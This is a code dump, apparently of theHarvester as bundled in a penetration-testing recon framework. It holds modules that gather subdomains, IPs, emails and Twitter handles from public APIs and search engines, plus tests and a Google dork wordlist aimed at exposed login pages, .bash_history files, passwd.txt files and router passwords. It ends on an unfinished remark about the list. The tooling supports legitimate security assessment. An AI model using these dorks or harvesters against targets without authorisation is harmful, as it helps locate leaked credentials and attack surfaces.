26 | if 'False' in auth_responses or 'Invalid authentication' in auth_responses:
27 | print('\tKey could not be authenticated exiting program.')
28 | await asyncio.sleep(2)
29 |
30 | async def do_search(self) -> None:
31 | # https://api.securitytrails.com/v1/domain/domain.com
32 | url = f'{self.api}domain/{self.word}'
33 | headers = {'APIKEY': self.key}
34 | response = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
35 | await asyncio.sleep(2) # Not random delay because 2 seconds is required due to rate limit.
36 | self.results = response[0]
37 | self.totalresults += self.results
38 | url += '/subdomains' # Get subdomains now.
39 | subdomain_response = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
40 | await asyncio.sleep(2)
41 | self.results = subdomain_response[0]
42 | self.totalresults += self.results
43 |
44 | async def process(self, proxy=False) -> None:
45 | self.proxy = proxy
46 | await self.authenticate()
47 | await self.do_search()
48 | parser = securitytrailsparser.Parser(word=self.word, text=self.totalresults)
49 | self.info = await parser.parse_text()
50 | # Create parser and set self.info to tuple returned from parsing text.
51 | print('\tDone Searching Results')
52 |
53 | async def get_ips(self) -> set:
54 | return self.info[0]
55 |
56 | async def get_hostnames(self) -> set:
57 | return self.info[1]
58 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/shodansearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from shodan import exception
4 | from shodan import Shodan
5 |
6 |
7 | class SearchShodan:
8 |
9 | def __init__(self):
10 | self.key = Core.shodan_key()
11 | if self.key is None:
12 | raise MissingKey(True)
13 | self.api = Shodan(self.key)
14 | self.hostdatarow = []
15 |
16 | async def search_ip(self, ip):
17 | try:
18 | ipaddress = ip
19 | results = self.api.host(ipaddress)
20 | technologies = []
21 | servicesports = []
22 | for result in results['data']:
23 | try:
24 | for key in result['http']['components'].keys():
25 | technologies.append(key)
26 | except KeyError:
27 | pass
28 | port = str(result.get('port'))
29 | product = str(result.get('product'))
30 | servicesports.append(str(product) + ':' + str(port))
31 | technologies = list(set(technologies))
32 | self.hostdatarow = [
33 | str(results.get('ip_str')), str(results.get('hostnames')).strip('[]\''),
34 | str(results.get('org')), str(servicesports).replace('\'', '').strip('[]'),
35 | str(technologies).replace('\'', '').strip('[]')]
36 | except exception.APIError:
37 | print(f'{ipaddress}: Not in Shodan')
38 | self.hostdatarow = [ipaddress, "Not in Shodan", "Not in Shodan", "Not in Shodan", "Not in Shodan"]
39 |
40 | except Exception as e:
41 | print(f'Error occurred in the Shodan IP search module: {e}')
42 | finally:
43 | return self.hostdatarow
44 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/spyse.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchSpyse:
6 |
7 | def __init__(self, word):
8 | self.ips = set()
9 | self.word = word
10 | self.key = Core.spyse_key()
11 | if self.key is None:
12 | raise MissingKey(True)
13 | self.results = ''
14 | self.hosts = set()
15 | self.proxy = False
16 |
17 | async def do_search(self):
18 | try:
19 | headers = {
20 | 'accept': 'application/json',
21 | 'Authorization': f'Bearer {self.key}',
22 | }
23 | base_url = f'https://api.spyse.com/v2/data/domain/subdomain?limit=100&domain={self.word}'
24 | results = await AsyncFetcher.fetch_all([base_url], json=True, proxy=self.proxy, headers=headers)
25 | results = results[0]
26 | self.hosts = {domain['name'] for domain in results['data']['items']}
27 | except Exception as e:
28 | print(f'An exception has occurred: {e.args}')
29 |
30 | async def get_hostnames(self):
31 | return self.hosts
32 |
33 | async def process(self, proxy=False):
34 | self.proxy = proxy
35 | await self.do_search()
36 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/sublist3r.py:
--------------------------------------------------------------------------------
1 | from typing import Type
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchSublist3r:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.totalhosts = list
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://api.sublist3r.com/search.php?domain={self.word}'
14 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
15 | self.totalhosts: list = response[0]
16 |
17 | async def get_hostnames(self) -> Type[list]:
18 | return self.totalhosts
19 |
20 | async def process(self, proxy=False):
21 | self.proxy = proxy
22 | await self.do_search()
23 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/suip.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from bs4 import BeautifulSoup
3 | import asyncio
4 |
5 |
6 | class SearchSuip:
7 |
8 | def __init__(self, word: str):
9 | self.word: str = word
10 | self.results: str = ''
11 | self.totalresults: str = ''
12 | self.totalhosts: set = set()
13 | self.totalips: set = set()
14 | self.proxy = False
15 |
16 | async def request(self, url, params, findomain=False):
17 | headers = {'User-Agent': Core.get_user_agent()}
18 | data = {'url': self.word.replace('www.', ''), 'only_resolved': '1', 'Submit1': 'Submit'} if findomain else \
19 | {'url': self.word.replace('www.', ''), 'Submit1': 'Submit'}
20 | return await AsyncFetcher.post_fetch(url, headers=headers, params=params, data=data, proxy=self.proxy)
21 |
22 | async def handler(self, url):
23 | first_param = [url, (('act', 'subfinder'),), False]
24 | second_param = [url, (('act', 'amass'),), False]
25 | third_param = [url, (('act', 'findomain'),), True]
26 | async_requests = [
27 | self.request(url=url, params=params, findomain=findomain)
28 | for url, params, findomain in [first_param, second_param, third_param]
29 | ]
30 | results = await asyncio.gather(*async_requests)
31 | return results
32 |
33 | async def do_search(self):
34 | try:
35 | results = await self.handler(url="https://suip.biz/")
36 | for num in range(len(results)):
37 | # iterate through results and parse out the urls
38 | result = results[num]
39 | soup = BeautifulSoup(str(result), 'html.parser')
40 | hosts: list = str(soup.find('pre')).splitlines() if num != 2 else \
41 | [line for line in str(soup.find('pre')).splitlines() if 'A total of' not in line]
42 | # The last iteration is special because findomain throws in some more lines that we need to filter out
43 | await self.clean_hosts(hosts)
44 | except Exception as e:
45 | print(f'An exception has occurred: {e.args}')
46 |
47 | async def get_hostnames(self) -> set:
48 | return self.totalhosts
49 |
50 | async def process(self, proxy=False):
51 | self.proxy = proxy
52 | await self.do_search()
53 | print('\tSearching results.')
54 |
55 | async def clean_hosts(self, soup_hosts):
56 | for host in soup_hosts:
57 | host = str(host).strip()
58 | if len(host) > 1 and self.word.replace('www.', '') in host:
59 | self.totalhosts.add(host[1:] if host[0] == '.' else host)
60 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/threatcrowd.py:
--------------------------------------------------------------------------------
1 | from typing import Coroutine
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 |
5 |
6 | class SearchThreatcrowd:
7 |
8 | def __init__(self, word):
9 | self.word = word.replace(' ', '%20')
10 | self.results: str = ""
11 | self.totalresults: str = ""
12 | self.proxy = False
13 |
14 | async def do_search(self):
15 | base_url = f'https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={self.word}'
16 | headers = {'User-Agent': Core.get_user_agent()}
17 | try:
18 | responses = await AsyncFetcher.fetch_all([base_url], headers=headers, proxy=self.proxy)
19 | self.results = responses[0]
20 | except Exception as e:
21 | print(e)
22 | self.totalresults += self.results
23 |
24 | async def get_hostnames(self) -> Coroutine:
25 | return await myparser.Parser(self.results, self.word).hostnames()
26 |
27 | async def process(self, proxy=False):
28 | self.proxy = proxy
29 | await self.do_search()
30 | await self.get_hostnames()
31 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/threatminer.py:
--------------------------------------------------------------------------------
1 | from typing import Type
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchThreatminer:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.totalhosts = list
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://api.threatminer.org/v2/domain.php?q={self.word}&rt=5'
14 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
15 | self.totalhosts: set = {host for host in response[0]['results']}
16 |
17 | async def get_hostnames(self) -> Type[list]:
18 | return self.totalhosts
19 |
20 | async def process(self, proxy=False):
21 | self.proxy = proxy
22 | await self.do_search()
23 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/twittersearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 | import re
5 |
6 |
7 | class SearchTwitter:
8 |
9 | def __init__(self, word, limit):
10 | self.word = word.replace(' ', '%20')
11 | self.results = ""
12 | self.totalresults = ""
13 | self.server = 'www.google.com'
14 | self.quantity = '100'
15 | self.limit = int(limit)
16 | self.counter = 0
17 | self.proxy = False
18 |
19 | async def do_search(self):
20 | base_url = f'https://{self.server}/search?num=100&start=xx&hl=en&meta=&q=site%3Atwitter.com%20intitle%3A%22on+Twitter%22%20{self.word}'
21 | headers = {'User-Agent': Core.get_user_agent()}
22 | try:
23 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
24 | for url in urls:
25 | response = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
26 | self.results = response[0]
27 | if await search(self.results):
28 | try:
29 | self.results = await google_workaround(url)
30 | if isinstance(self.results, bool):
31 | print('Google is blocking your ip and the workaround, returning')
32 | return
33 | except Exception:
34 | # google blocked, no useful result
35 | return
36 | self.totalresults += self.results
37 | except Exception as error:
38 | print(error)
39 |
40 | async def get_people(self, proxy=False):
41 | self.proxy = proxy
42 | rawres = myparser.Parser(self.totalresults, self.word)
43 | to_parse = await rawres.people_twitter()
44 | # fix invalid handles that look like @user other_output
45 | handles = set()
46 | for handle in to_parse:
47 | result = re.search(r'^@?(\w){1,15}', handle)
48 | if result:
49 | handles.add(result.group(0))
50 | return handles
51 |
52 | async def process(self):
53 | await self.do_search()
54 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/urlscan.py:
--------------------------------------------------------------------------------
1 | from typing import Type
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchUrlscan:
6 | def __init__(self, word):
7 | self.word = word
8 | self.totalhosts = list
9 | self.totalips = list
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://urlscan.io/api/v1/search/?q=domain:{self.word}'
14 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
15 | resp = response[0]
16 | self.totalhosts = {f"{page['page']['domain']}" for page in resp['results']}
17 | self.totalips = {f"{page['page']['ip']}" for page in resp['results'] if 'ip' in page['page'].keys()}
18 |
19 | async def get_hostnames(self) -> Type[list]:
20 | return self.totalhosts
21 |
22 | async def get_ips(self) -> Type[list]:
23 | return self.totalips
24 |
25 | async def process(self, proxy=False):
26 | self.proxy = proxy
27 | await self.do_search()
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/virustotal.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 | import re
4 |
5 |
6 | class SearchVirustotal:
7 |
8 | def __init__(self, word):
9 | self.word = word
10 | self.results = ""
11 | self.totalresults = ""
12 | self.quantity = '100'
13 | self.counter = 0
14 | self.proxy = False
15 |
16 | async def do_search(self):
17 | base_url = f'https://www.virustotal.com/ui/domains/{self.word}/subdomains?relationships=resolutions&cursor=STMwCi4%3D&limit=40'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | responses = await AsyncFetcher.fetch_all([base_url], headers=headers, proxy=self.proxy)
20 | self.results = responses[0]
21 | self.totalresults += self.results
22 |
23 | async def get_hostnames(self):
24 | rawres = myparser.Parser(self.results, self.word)
25 | new_lst = []
26 | for host in await rawres.hostnames():
27 | host = str(host)
28 | if host[0].isdigit():
29 | matches = re.match('.+([0-9])[^0-9]*$', host)
30 | # Get last digit of string and shift hostname to remove ip in string
31 | new_lst.append(host[matches.start(1) + 1:])
32 | else:
33 | new_lst.append(host)
34 | return new_lst
35 |
36 | async def process(self, proxy=False):
37 | self.proxy = proxy
38 | print('\tSearching results.')
39 | await self.do_search()
40 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/yahoosearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 |
4 |
5 | class SearchYahoo:
6 |
7 | def __init__(self, word, limit):
8 | self.word = word
9 | self.total_results = ""
10 | self.server = 'search.yahoo.com'
11 | self.limit = limit
12 | self.proxy = False
13 |
14 | async def do_search(self):
15 | base_url = f'https://{self.server}/search?p=%40{self.word}&b=xx&pz=10'
16 | headers = {
17 | 'Host': self.server,
18 | 'User-agent': Core.get_user_agent()
19 | }
20 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
21 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
22 | for response in responses:
23 | self.total_results += response
24 |
25 | async def process(self):
26 | await self.do_search()
27 |
28 | async def get_emails(self):
29 | rawres = myparser.Parser(self.total_results, self.word)
30 | toparse_emails = await rawres.emails()
31 | emails = set()
32 | # strip out numbers and dashes for emails that look like xxx-xxx-xxxemail@host.tld
33 | for email in toparse_emails:
34 | email = str(email)
35 | if '-' in email and email[0].isdigit() and email.index('-') <= 9:
36 | while email[0] == '-' or email[0].isdigit():
37 | email = email[1:]
38 | emails.add(email)
39 | return list(emails)
40 |
41 | async def get_hostnames(self, proxy=False):
42 | self.proxy = proxy
43 | rawres = myparser.Parser(self.total_results, self.word)
44 | return await rawres.hostnames()
45 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/lib/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['hostchecker']
2 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/lib/hostchecker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | """
4 | Created by laramies on 2008-08-21.
5 | Revised to use aiodns & asyncio on 2019-09-23
6 | """
7 |
8 | import aiodns
9 | import asyncio
10 | import socket
11 | from typing import Tuple, Any
12 |
13 |
14 | class Checker:
15 |
16 | def __init__(self, hosts: list, nameserver=False):
17 | self.hosts = hosts
18 | self.realhosts: list = []
19 | self.addresses: set = set()
20 | self.nameserver = []
21 | if nameserver:
22 | self.nameserver = nameserver
23 |
24 | @staticmethod
25 | async def query(host, resolver) -> Tuple[str, Any]:
26 | try:
27 | result = await resolver.gethostbyname(host, socket.AF_INET)
28 | addresses = result.addresses
29 | if addresses == [] or addresses is None or result is None:
30 | return f"{host}:", tuple()
31 | else:
32 | return f"{host}:{', '.join(map(str, addresses))}", addresses
33 | except Exception:
34 | return f"{host}", tuple()
35 |
36 | async def query_all(self, resolver) -> list:
37 | results = await asyncio.gather(*[asyncio.create_task(self.query(host, resolver))
38 | for host in self.hosts])
39 | return results
40 |
41 | async def check(self):
42 | loop = asyncio.get_event_loop()
43 | resolver = aiodns.DNSResolver(loop=loop, timeout=4) if len(self.nameserver) == 0\
44 | else aiodns.DNSResolver(loop=loop, timeout=4, nameservers=self.nameserver)
45 | results = await self.query_all(resolver)
46 | for host, address in results:
47 | self.realhosts.append(host)
48 | self.addresses.update({addr for addr in address})
49 | # address may be a list of ips
50 | # and do a set comprehension to remove duplicates
51 | self.realhosts.sort()
52 | self.addresses = list(self.addresses)
53 | return self.realhosts, self.addresses
54 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/intelxparser.py:
--------------------------------------------------------------------------------
1 | class Parser:
2 |
3 | def __init__(self):
4 | self.emails = set()
5 | self.hosts = set()
6 |
7 | async def parse_dictionaries(self, results: dict) -> tuple:
8 | """
9 | Parse method to parse json results
10 | :param results: Dictionary containing a list of dictionaries known as selectors
11 | :return: tuple of emails and hosts
12 | """
13 | if results is not None:
14 | for dictionary in results["selectors"]:
15 | field = dictionary['selectorvalue']
16 | if '@' in field:
17 | self.emails.add(field)
18 | else:
19 | field = str(field)
20 | if 'http' in field or 'https' in field:
21 | if field[:5] == 'https':
22 | field = field[8:]
23 | else:
24 | field = field[7:]
25 | self.hosts.add(field.replace(')', '').replace(',', ''))
26 | return self.emails, self.hosts
27 | return None, None
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/parsers/securitytrailsparser.py:
--------------------------------------------------------------------------------
1 | from typing import Union, Tuple, List
2 |
3 |
4 | class Parser:
5 |
6 | def __init__(self, word, text):
7 | self.word = word
8 | self.text = text
9 | self.hostnames = set()
10 | self.ips = set()
11 |
12 | async def parse_text(self) -> Union[List, Tuple]:
13 | sub_domain_flag = 0
14 | self.text = str(self.text).splitlines()
15 | # Split lines to get a list of lines.
16 | for index in range(0, len(self.text)):
17 | line = self.text[index].strip()
18 | if '"ip":' in line:
19 | # Extract IP.
20 | ip = ''
21 | for ch in line[7:]:
22 | if ch == '"':
23 | break
24 | else:
25 | ip += ch
26 | self.ips.add(ip)
27 | elif '"subdomains":' in line:
28 | # subdomains start here so set flag to 1
29 | sub_domain_flag = 1
30 | continue
31 | elif sub_domain_flag > 0:
32 | if ']' in line:
33 | sub_domain_flag = 0
34 | else:
35 | if 'www' in self.word:
36 | self.word = str(self.word).replace('www.', '').replace('www', '')
37 | # Remove www from word if entered
38 | self.hostnames.add(str(line).replace('"', '').replace(',', '') + '.' + self.word)
39 | else:
40 | continue
41 | return list(self.ips), list(self.hostnames)
42 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/setup.cfg:
--------------------------------------------------------------------------------
1 | [flake8]
2 | ignore = E501, F405, F403, E402
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/setup.py:
--------------------------------------------------------------------------------
1 | import setuptools
2 | from theHarvester.lib.core import Core
3 |
4 | with open('README.md', 'r') as fh:
5 | long_description = fh.read()
6 |
7 | setuptools.setup(
8 | name='theHarvester',
9 | version=Core.version(),
10 | author="Christian Martorella",
11 | author_email="cmartorella@edge-security.com",
12 | description="theHarvester is a very simple, yet effective tool designed to be used in the early stages of a penetration test",
13 | long_description=long_description,
14 | long_description_content_type="text/markdown",
15 | url="https://github.com/laramies/theHarvester",
16 | packages=setuptools.find_packages(exclude=['tests']),
17 | entry_points={
18 | 'console_scripts': [
19 | 'theHarvester = theHarvester.__main__:entry_point'
20 | ]
21 | },
22 |
23 | classifiers=[
24 | "Programming Language :: Python :: 3",
25 | "Programming Language :: Python :: 3.7",
26 | "Programming Language :: Python :: 3.8",
27 | "License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
28 | "Operating System :: OS Independent",
29 | ],
30 | data_files=[
31 | ('/etc/theHarvester', [
32 | 'wordlists/general/common.txt',
33 | 'wordlists/dns-big.txt',
34 | 'wordlists/dns-names.txt',
35 | 'wordlists/dorks.txt',
36 | 'wordlists/names_small.txt',
37 | 'api-keys.yaml',
38 | 'proxies.yaml'
39 | ]
40 | )
41 | ],
42 | )
43 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/tests/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/tests/discovery/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_certspotter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | from theHarvester.lib.core import *
4 | from theHarvester.discovery import certspottersearch
5 | import requests
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestCertspotter(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'metasploit.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://api.certspotter.com/v1/issuances?domain={TestCertspotter.domain()}&expand=dns_names'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = certspottersearch.SearchCertspoter(TestCertspotter.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), set)
26 |
27 | async def test_search_no_results(self):
28 | search = certspottersearch.SearchCertspoter('radiant.eu')
29 | await search.process()
30 | assert len(await search.get_hostnames()) == 0
31 |
32 |
33 | if __name__ == '__main__':
34 | pytest.main()
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_linkedin_links.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | from theHarvester.discovery import linkedinsearch
4 | from theHarvester.discovery.constants import splitter
5 | import os
6 | import re
7 | import pytest
8 |
9 | pytestmark = pytest.mark.asyncio
10 |
11 |
12 | class TestGetLinks(object):
13 |
14 | async def test_splitter(self):
15 | results = [
16 | 'https://www.linkedin.com/in/don-draper-b1045618',
17 | 'https://www.linkedin.com/in/don-draper-b59210a',
18 | 'https://www.linkedin.com/in/don-draper-b5bb50b3',
19 | 'https://www.linkedin.com/in/don-draper-b83ba26',
20 | 'https://www.linkedin.com/in/don-draper-b854a51'
21 | ]
22 | filtered_results = await splitter(results)
23 | assert len(filtered_results) == 1
24 |
25 | async def test_get_links(self):
26 | search = linkedinsearch.SearchLinkedin("facebook.com", '100')
27 | await search.process()
28 | links = await search.get_links()
29 | assert isinstance(links, list)
30 |
31 | async def test_links_linkedin(self):
32 | dir_path = os.path.dirname(os.path.realpath(__file__))
33 | mock_response = open(dir_path + "/test_linkedin_links.txt")
34 | mock_response_content = mock_response.read()
35 | mock_response.close()
36 | reg_links = re.compile(r"url=https:\/\/www\.linkedin.com(.*?)&")
37 | temp = reg_links.findall(mock_response_content)
38 | resul = []
39 | for regex_item in temp:
40 | stripped_url = regex_item.replace("url=", "")
41 | resul.append("https://www.linkedin.com" + stripped_url)
42 | assert set(resul)
43 |
44 |
45 | if __name__ == '__main__':
46 | pytest.main()
47 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_otx.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | from theHarvester.lib.core import *
4 | from theHarvester.discovery import otxsearch
5 | import requests
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestOtx(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'metasploit.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://otx.alienvault.com/api/v1/indicators/domain/{TestOtx.domain()}/passive_dns'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = otxsearch.SearchOtx(TestOtx.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), set)
26 |
27 | async def test_search_no_results(self):
28 | search = otxsearch.SearchOtx('radiant.eu')
29 | await search.process()
30 | assert len(await search.get_hostnames()) == 0
31 |
32 |
33 | if __name__ == '__main__':
34 | pytest.main()
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_sublist3r.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | import requests
4 | from theHarvester.lib.core import *
5 | from theHarvester.discovery import sublist3r
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestSublist3r(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'target.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://api.sublist3r.com/search.php?domain={TestSublist3r.domain()}'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = sublist3r.SearchSublist3r(TestSublist3r.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), list)
26 |
27 |
28 | if __name__ == '__main__':
29 | pytest.main()
30 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/discovery/test_threatminer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 | import requests
4 | from theHarvester.lib.core import *
5 | from theHarvester.discovery import threatminer
6 | import pytest
7 |
8 | pytestmark = pytest.mark.asyncio
9 |
10 |
11 | class TestThreatminer(object):
12 | @staticmethod
13 | def domain() -> str:
14 | return 'target.com'
15 |
16 | async def test_api(self):
17 | base_url = f'https://api.threatminer.org/v2/domain.php?q={TestThreatminer.domain()}&rt=5'
18 | headers = {'User-Agent': Core.get_user_agent()}
19 | request = requests.get(base_url, headers=headers)
20 | assert request.status_code == 200
21 |
22 | async def test_search(self):
23 | search = threatminer.SearchThreatminer(TestThreatminer.domain())
24 | await search.process()
25 | assert isinstance(await search.get_hostnames(), set)
26 |
27 |
28 | if __name__ == '__main__':
29 | pytest.main()
30 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/tests/test_myparser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding=utf-8
3 |
4 | from theHarvester.parsers import myparser
5 | import pytest
6 |
7 |
8 | class TestMyParser(object):
9 |
10 | @pytest.mark.asyncio
11 | async def test_emails(self):
12 | word = 'domain.com'
13 | results = '@domain.com***a@domain***banotherdomain.com***c@domain.com***d@sub.domain.com***'
14 | parse = myparser.Parser(results, word)
15 | emails = sorted(await parse.emails())
16 | assert emails == ['c@domain.com', 'd@sub.domain.com']
17 |
18 |
19 | if __name__ == '__main__':
20 | pytest.main()
21 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/theHarvester-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/theHarvester-logo.png
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/theHarvester.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | # Note: This script runs theHarvester
4 | from platform import python_version
5 | import sys
6 | import asyncio
7 | import uvloop
8 | # from theHarvester import __main__
9 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester import __main__
10 |
11 | def run_theHarvester(domain):
12 | uvloop.install()
13 | # all_ip, all_emails, all_hosts = asyncio.run(__main__.entry_point(domain))
14 | return asyncio.run(__main__.entry_point(domain))
15 |
16 |
17 | if __name__ == "__main__":
18 | domains = ['']
19 | for domain in domains:
20 | run_theHarvester(domain)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/wordlists/dorks.txt:
--------------------------------------------------------------------------------
1 | login.html
2 | administrator/login.%XT%
3 | admin_area/login.%XT%
4 | intext:@
5 | inurl:
6 | intitle:
7 | intext:
8 | sysadm/
9 | administratoraccounts/
10 | usr/
11 | root/
12 | secret/
13 | admin/login.%XT%
14 | moderator/login.%XT%
15 | login%XT%
16 | logout%XT%
17 | super_index%XT%
18 | super_login%XT%
19 | supermanager%XT%
20 | superuser%XT%
21 | inurl:/publications.asp?type=
22 | intitle:"Index of" .bash_history
23 | intitle:"index of" members OR accounts
24 | inurl:section.php?id=
25 | =inurl:/filedown.php?file=
26 | inurl:/shared/help.php?page=
27 | inurl:index.php?load=
28 | inurl:home.php?pagina=
29 | index.php?mode=
30 | intitle:"index of" +myd size
31 | inurl:public
32 | intitle:index.of inbox
33 | intext:"Storage Management Server for" intitle:"Server Administration"
34 | inurl:"gs/adminlogin.aspx"
35 | "http://*:*@www"
36 | =enable password | secret "current configuration" -intext:the
37 | wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
38 | robots.txt
39 | php-addressbook "This is the addressbook for *" -warning
40 | intitle:"index of" members OR accounts
41 |
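Note: the %XT% token in these dorks looks like a file-extension placeholder. As a hedged illustration only (the substitution logic, the extension list, and the site: scoping below are assumptions, not code from this repository), such a list could be expanded per target like this:

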